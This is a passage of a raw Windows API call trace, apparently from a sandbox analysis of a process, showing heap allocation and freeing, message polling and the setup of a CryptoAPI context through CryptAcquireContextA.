(HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.388] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0200.388] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0200.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0200.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0200.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0200.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a48 [0200.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0200.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0200.389] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0200.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0200.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0200.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0200.389] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0200.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0200.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0200.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0200.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0200.394] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0200.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0200.395] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.395] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0200.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0200.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0200.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0200.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0200.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0200.396] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.396] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0200.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0200.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.398] HeapFree (in: hHeap=0x970000, 